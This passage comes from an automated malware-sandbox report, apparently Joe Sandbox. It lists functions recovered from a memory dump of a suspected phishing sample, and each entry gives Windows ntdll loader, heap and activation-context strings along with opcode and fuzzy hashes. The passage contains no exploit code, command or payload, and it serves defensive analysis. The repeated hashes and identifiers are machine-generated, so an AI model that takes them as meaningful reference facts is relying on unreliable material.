                                                                                                              • HandleTraces, xrefs: 01BC8C8F
                                                                                                              • VerifierDebug, xrefs: 01BC8CA5
                                                                                                              • VerifierFlags, xrefs: 01BC8C50
                                                                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01BC8A67
                                                                                                              • AVRF: -*- final list of providers -*- , xrefs: 01BC8B8F
                                                                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01BC8A3D
                                                                                                              • VerifierDlls, xrefs: 01BC8CBD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                              • API String ID: 0-3223716464
                                                                                                              • Opcode ID: 4eb8f413c003df5a999e20072db1399ae31062fb9061ccb5b32e87cdf08b4cc3
                                                                                                              • Instruction ID: 7f78fdae4d737b813a9813e6fe5f0e8ff7f0e5d7955041a49997dfe37eb4e523
                                                                                                              • Opcode Fuzzy Hash: 4eb8f413c003df5a999e20072db1399ae31062fb9061ccb5b32e87cdf08b4cc3
                                                                                                              • Instruction Fuzzy Hash: D19110B2601716AFDB29DF6CD880B6B7BA4EBA4F14F0505DCFA45AB250C771D8008B91
                                                                                                              Function 01B4EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                              • API String ID: 0-1109411897
                                                                                                              • Opcode ID: 0b49bd008e97340fa43883d47e6f2986c6e39b751296b8899d844f8ee3976373
                                                                                                              • Instruction ID: 452a343e69487fca5115c7a3bc05b52f819339b33f128a1e099579885b197c4e
                                                                                                              • Opcode Fuzzy Hash: 0b49bd008e97340fa43883d47e6f2986c6e39b751296b8899d844f8ee3976373
                                                                                                              • Instruction Fuzzy Hash: 79A24970A0962A8FDF68DF19C8887A9BBB1FF45304F5482E9D90DA7250DB749E85DF00
                                                                                                              Function 01B763FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-792281065
                                                                                                              • Opcode ID: 42a5e87082f9f3db21c988d5cd8cd27df0ae05c11fc1889f2ca6aba7e6a8df1c
                                                                                                              • Instruction ID: f6cb370df3e8f917e58bf6f7f5f1918dff6d1313eb43ae8e1e0b0e5a15069881
                                                                                                              • Opcode Fuzzy Hash: 42a5e87082f9f3db21c988d5cd8cd27df0ae05c11fc1889f2ca6aba7e6a8df1c
                                                                                                              • Instruction Fuzzy Hash: 0E913470A00755EBEF2DDF18E984BBA7BA1FF51B14F0001E8E9166BA92D7B4C801D791
                                                                                                              Function 01B3645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01B99A11, 01B99A3A
                                                                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01B99A01
                                                                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01B99A2A
                                                                                                              • LdrpInitShimEngine, xrefs: 01B999F4, 01B99A07, 01B99A30
                                                                                                              • apphelp.dll, xrefs: 01B36496
                                                                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01B999ED
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-204845295
                                                                                                              • Opcode ID: 099ad12fe2396291513e36a97b4c1c0f24900983daed559dd4dc8f030db98eff
                                                                                                              • Instruction ID: 429ab8ee86b90c8d47de0631cae823a75199903e1ffab7839f7e838b9edb79f1
                                                                                                              • Opcode Fuzzy Hash: 099ad12fe2396291513e36a97b4c1c0f24900983daed559dd4dc8f030db98eff
                                                                                                              • Instruction Fuzzy Hash: 2551D671208305AFDB29DF24D841BAB77E8FB94748F4109ADF586971A0D734DA05CB92
                                                                                                              Function 01B7C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • Loading import redirection DLL: '%wZ', xrefs: 01BB8170
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01B7C6C3
                                                                                                              • LdrpInitializeImportRedirection, xrefs: 01BB8177, 01BB81EB
                                                                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 01BB81E5
                                                                                                              • LdrpInitializeProcess, xrefs: 01B7C6C4
                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01BB8181, 01BB81F5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                              • API String ID: 0-475462383
                                                                                                              • Opcode ID: f81cda6772700824243b4853b46ebbf412b79eed238624d104b9ca39f0dd8a40
                                                                                                              • Instruction ID: a03364ab95b2a093cbbd17564924b802bc6b7a0f6806ef6a9b3a3604aec2c3cc
                                                                                                              • Opcode Fuzzy Hash: f81cda6772700824243b4853b46ebbf412b79eed238624d104b9ca39f0dd8a40
                                                                                                              • Instruction Fuzzy Hash: 833129716443469BC61CEF29D986E6A77D8EFD4B10F0005DCF8455B290D764EC04C7A2
                                                                                                              Function 01B72674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01BB2180
                                                                                                              • RtlGetAssemblyStorageRoot, xrefs: 01BB2160, 01BB219A, 01BB21BA
                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01BB21BF
                                                                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01BB219F
                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01BB2178
                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 01BB2165
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                              • API String ID: 0-861424205
                                                                                                              • Opcode ID: 1e8cc747df7b7b97cf3d6088f15d6759e32b2e579ad748b915d9bcd270f4e3e1
                                                                                                              • Instruction ID: 933c1ac737397d1c787a6ad5182b87422cedd9d81abf6abdcd4dd5b462d833a9
                                                                                                              • Opcode Fuzzy Hash: 1e8cc747df7b7b97cf3d6088f15d6759e32b2e579ad748b915d9bcd270f4e3e1
                                                                                                              • Instruction Fuzzy Hash: B5310B36F4022577FB198A9BCC81FAABB79DB65A50F0500DDF7146B250D7B0AE01C6A0
                                                                                                              Function 01B8096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 01B82DF0: LdrInitializeThunk.NTDLL ref: 01B82DFA
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B80BA3
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B80BB6
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B80D60
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B80D74
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 1404860816-0
                                                                                                              • Opcode ID: f908b61cc5f14589bd28bc80e8e2390a8060b59e5d65e34263b7b8e346b1e4bb
                                                                                                              • Instruction ID: 578b6d09378460db8473768f0fac7febc7f5496f92b51dade88ebc8d9cc554fa
                                                                                                              • Opcode Fuzzy Hash: f908b61cc5f14589bd28bc80e8e2390a8060b59e5d65e34263b7b8e346b1e4bb
                                                                                                              • Instruction Fuzzy Hash: B74249B1900715DFDB65DF68C880BAAB7F4FF08704F1445E9E989AB641E770AA84CF60
                                                                                                              Function 01B4A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                              • API String ID: 0-379654539
                                                                                                              • Opcode ID: 51b81a1869feaea3d7af2dedbe9c558d036e86105211e945a1b65c75356b3321
                                                                                                              • Instruction ID: 4b70fb03d8d8e0c5e5a913faf28c0a53ab67961a33ec3ac55d2f81cd2ea5856b
                                                                                                              • Opcode Fuzzy Hash: 51b81a1869feaea3d7af2dedbe9c558d036e86105211e945a1b65c75356b3321
                                                                                                              • Instruction Fuzzy Hash: E2C1AD74148382CFD719DF68C140B6AB7E4FF84704F0489EAF9968B251E734CA49DB92
                                                                                                              Function 01B78402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01B78421
                                                                                                              • LdrpInitializeProcess, xrefs: 01B78422
                                                                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 01B7855E
                                                                                                              • @, xrefs: 01B78591
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-1918872054
                                                                                                              • Opcode ID: 79b9cbd090dc1b4e9c672ce74db5d4d47a2c054ea7c6d4380ed48b241fadb700
                                                                                                              • Instruction ID: ea30df6b448057c2ccbc228cfa45f54cbb55b571a2f8c966c7ef4a7c548fe852
                                                                                                              • Opcode Fuzzy Hash: 79b9cbd090dc1b4e9c672ce74db5d4d47a2c054ea7c6d4380ed48b241fadb700
                                                                                                              • Instruction Fuzzy Hash: 87918A71508345AFDB29EF65C884FABBAECFB94744F4009AEFA94D2151E370D904CB62
                                                                                                              Function 01B7273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01BB22B6
                                                                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01BB21D9, 01BB22B1
                                                                                                              • .Local, xrefs: 01B728D8
                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 01BB21DE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                              • API String ID: 0-1239276146
                                                                                                              • Opcode ID: 1c7fe8713dc9abaa284ae93cea7de87e571bbadf386d2827b4afa8f680e21d16
                                                                                                              • Instruction ID: f99738267679370e900d72c7dc56dbf3bd17254ac1dbe3c88429b5cab5108e48
                                                                                                              • Opcode Fuzzy Hash: 1c7fe8713dc9abaa284ae93cea7de87e571bbadf386d2827b4afa8f680e21d16
                                                                                                              • Instruction Fuzzy Hash: B0A1AE3590022A9FDF29CF68C884BA9B7B1FF58354F1941F9D918AB251D770AE81CF90
                                                                                                              Function 01B74AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 01BB342A
                                                                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01BB3456
                                                                                                              • RtlDeactivateActivationContext, xrefs: 01BB3425, 01BB3432, 01BB3451
                                                                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01BB3437
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                              • API String ID: 0-1245972979
                                                                                                              • Opcode ID: de792ce2700195149e0942c639aeeacd6b78ecabd6e493147a0a73b573857401
                                                                                                              • Instruction ID: 65ee838b1cb922438b8f22d6a58f49caf3e97fd48f00bcb55e43a3e3886d7ae9
                                                                                                              • Opcode Fuzzy Hash: de792ce2700195149e0942c639aeeacd6b78ecabd6e493147a0a73b573857401
                                                                                                              • Instruction Fuzzy Hash: 206111326007129BDB2ACF1CC881B7AB7E1EF80B51F1486EDE9659B660D774EC01CB91
                                                                                                              Function 01B464AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01BA106B
                                                                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01BA10AE
                                                                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01BA0FE5
                                                                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01BA1028
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                              • API String ID: 0-1468400865
                                                                                                              • Opcode ID: 60b1c17a8a58cc7048264df00ef5331993951469d303ccbee5e6606e3885d960
                                                                                                              • Instruction ID: 8b806de20d6ee546b05bb6eda1ed9b2f7d51c6755feb8bdbe05a347a0490c073
                                                                                                              • Opcode Fuzzy Hash: 60b1c17a8a58cc7048264df00ef5331993951469d303ccbee5e6606e3885d960
                                                                                                              • Instruction Fuzzy Hash: 817110B19043099FCF25EF18C880BA77FA9EF95B60F4044A8F9488B146D334D589CBD2
                                                                                                              Function 01B6245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01BAA9A2
                                                                                                              • apphelp.dll, xrefs: 01B62462
                                                                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01BAA992
                                                                                                              • LdrpDynamicShimModule, xrefs: 01BAA998
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-176724104
                                                                                                              • Opcode ID: c777cae5db4fa525af2d6ba5b35209b0e7d08a5bad016bf2c18cd66a2b27f1a7
                                                                                                              • Instruction ID: e31f7345c44824cc23940898723d0bd53d94e18f10c205d2a17caad54cea394a
                                                                                                              • Opcode Fuzzy Hash: c777cae5db4fa525af2d6ba5b35209b0e7d08a5bad016bf2c18cd66a2b27f1a7
                                                                                                              • Instruction Fuzzy Hash: 93316D71A00201EBDB399F6DD881BBA77B8FB94B00F5640D9E9026B255C7B4D941C791
                                                                                                              Function 01B529A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 01B5327D
                                                                                                              • HEAP: , xrefs: 01B53264
                                                                                                              • HEAP[%wZ]: , xrefs: 01B53255
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                              • API String ID: 0-617086771
                                                                                                              • Opcode ID: 06b01803021bde19e3efa8100dd531d85a5d01ec124b5c34dbb2846a0dfb7495
                                                                                                              • Instruction ID: f96039760c2f4e15e972f33973384461f885a5fb1cc77fb305c273a21b35c695
                                                                                                              • Opcode Fuzzy Hash: 06b01803021bde19e3efa8100dd531d85a5d01ec124b5c34dbb2846a0dfb7495
                                                                                                              • Instruction Fuzzy Hash: DD929971A05249DFEB69CF68C440BADBBF1FF48300F1881D9E946AB3A2D735A945CB50
                                                                                                              Function 01B50770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                              • API String ID: 0-4253913091
                                                                                                              • Opcode ID: 52270df81289ad099742842028e46e44bb30460365a6bccc056837d990bc57d7
                                                                                                              • Instruction ID: f61cae4a9d9f34cd0a6345693d92a467d86bbc9f16370acd7b73967150d0399c
                                                                                                              • Opcode Fuzzy Hash: 52270df81289ad099742842028e46e44bb30460365a6bccc056837d990bc57d7
                                                                                                              • Instruction Fuzzy Hash: 61F1AD70A04606DFEB69DF68C884F6AB7F5FF44300F1442A8E9169B395D730EA81CB90
                                                                                                              Function 01B66962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID: $@
                                                                                                              • API String ID: 2994545307-1077428164
                                                                                                              • Opcode ID: ec6ce5e0450f93b34f8a545906d5e5ce1be45e718e7af2bda7814ac6d3a474a4
                                                                                                              • Instruction ID: 07b90582b1a13152b912d5354217226a77ed00e0a00ce40e3df67d869080ee73
                                                                                                              • Opcode Fuzzy Hash: ec6ce5e0450f93b34f8a545906d5e5ce1be45e718e7af2bda7814ac6d3a474a4
                                                                                                              • Instruction Fuzzy Hash: 16C283716083419FDB29CF28C841B6BBBE9EF98754F0489ADF989C7251DB38D805CB52
                                                                                                              Function 01B3A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                                                                              • API String ID: 0-2779062949
                                                                                                              • Opcode ID: ed67497ac0e1e008972f5dddd080452c5e9c4f80934a12e242d8c1695ab6e72f
                                                                                                              • Instruction ID: 83313d509cb8b1d4da3f84ae1992d21074d6ceed39d03f3937ac8d6948039c46
                                                                                                              • Opcode Fuzzy Hash: ed67497ac0e1e008972f5dddd080452c5e9c4f80934a12e242d8c1695ab6e72f
                                                                                                              • Instruction Fuzzy Hash: 0CA15C719116299BDF35DF68CC88BAABBB8EF48710F1001E9E909E7250D7359E85CF50
                                                                                                              Function 01B60BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01BAA121
                                                                                                              • LdrpCheckModule, xrefs: 01BAA117
                                                                                                              • Failed to allocated memory for shimmed module list, xrefs: 01BAA10F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-161242083
                                                                                                              • Opcode ID: 9326a0c68d789a98a8d13df7e59bacb3f872c3b09bd5a5472c4980bb36c02c36
                                                                                                              • Instruction ID: 9994e2c50de2e92ffec0ec2c15b7ee233fcced5bb20f683b809554472a0b4c9d
                                                                                                              • Opcode Fuzzy Hash: 9326a0c68d789a98a8d13df7e59bacb3f872c3b09bd5a5472c4980bb36c02c36
                                                                                                              • Instruction Fuzzy Hash: AD71AF71A00205DFDF2DEF69C984BAEB7F8EB68604F1444ADE802DB255D738AA41CB51
                                                                                                              Function 01B50A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                              • API String ID: 0-1334570610
                                                                                                              • Opcode ID: 572b0760bbfbefe5d6101c953ce03b60513b4849f20a6b65dc50caae30a45aaa
                                                                                                              • Instruction ID: 2309964056416fcba25f08d60e4f3e7d18f6075be1100e987aa34cdc9076a07d
                                                                                                              • Opcode Fuzzy Hash: 572b0760bbfbefe5d6101c953ce03b60513b4849f20a6b65dc50caae30a45aaa
                                                                                                              • Instruction Fuzzy Hash: BB61CE30604301DFDB6DDF28C480B6ABBE1FF84704F148699E84ACB292D770E981CB91
                                                                                                              Function 01B7C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01BB82E8
                                                                                                              • Failed to reallocate the system dirs string !, xrefs: 01BB82D7
                                                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 01BB82DE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-1783798831
                                                                                                              • Opcode ID: d321091286f6db1b084b3ac365d4460450b3e33ae66fec90dbae4db9ec721496
                                                                                                              • Instruction ID: 497ce651074085d7454b4d415e247ed82d1255154a8e61e6e447285c26baa29b
                                                                                                              • Opcode Fuzzy Hash: d321091286f6db1b084b3ac365d4460450b3e33ae66fec90dbae4db9ec721496
                                                                                                              • Instruction Fuzzy Hash: 6D41F6B1505312ABCB29EB68D941B9BBBE8EF64750F0045AEF959D3250EBB4D800CB91
